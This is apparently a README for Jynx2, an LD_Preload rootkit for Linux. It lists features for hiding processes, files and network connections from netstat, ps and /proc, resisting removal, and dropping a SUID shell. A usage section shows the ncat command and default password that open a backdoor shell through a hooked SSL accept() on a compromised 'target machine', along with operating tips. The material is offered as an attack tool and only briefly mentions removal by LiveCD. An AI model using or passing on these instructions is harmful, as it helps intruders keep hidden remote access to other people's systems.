Jynx Rootkit/2.0
Jynx2 is an expansion of the original Jynx LD_Preload rootkit written in C with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features.
Features:
Hiding from netstat
Hiding from ps/top and /proc
File hiding
SSL connect accept() hook
Multi-factor authentication
Improved anti-removal features
SUID Drop-shell with environment variable
Protip: It is possible to make Jynx2 even more difficult to remove by hooking C's link() function, therefore we recommend that any LD_Preload rootkit be removed using a LiveCD.
Usage:
Once Jynx2 is successfully installed on a target machine, accessing it's accept() hook with the default configuration looks like:
[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl
DEFAULT_PASS
Bump with shell.
>ls -lia
214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 .
177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..
Protip: Make sure to using the --ssl flag with ncat, otherwise Jynx2 will not accept the connection, with the connection's file descriptor being passed to the backdoored service in stead.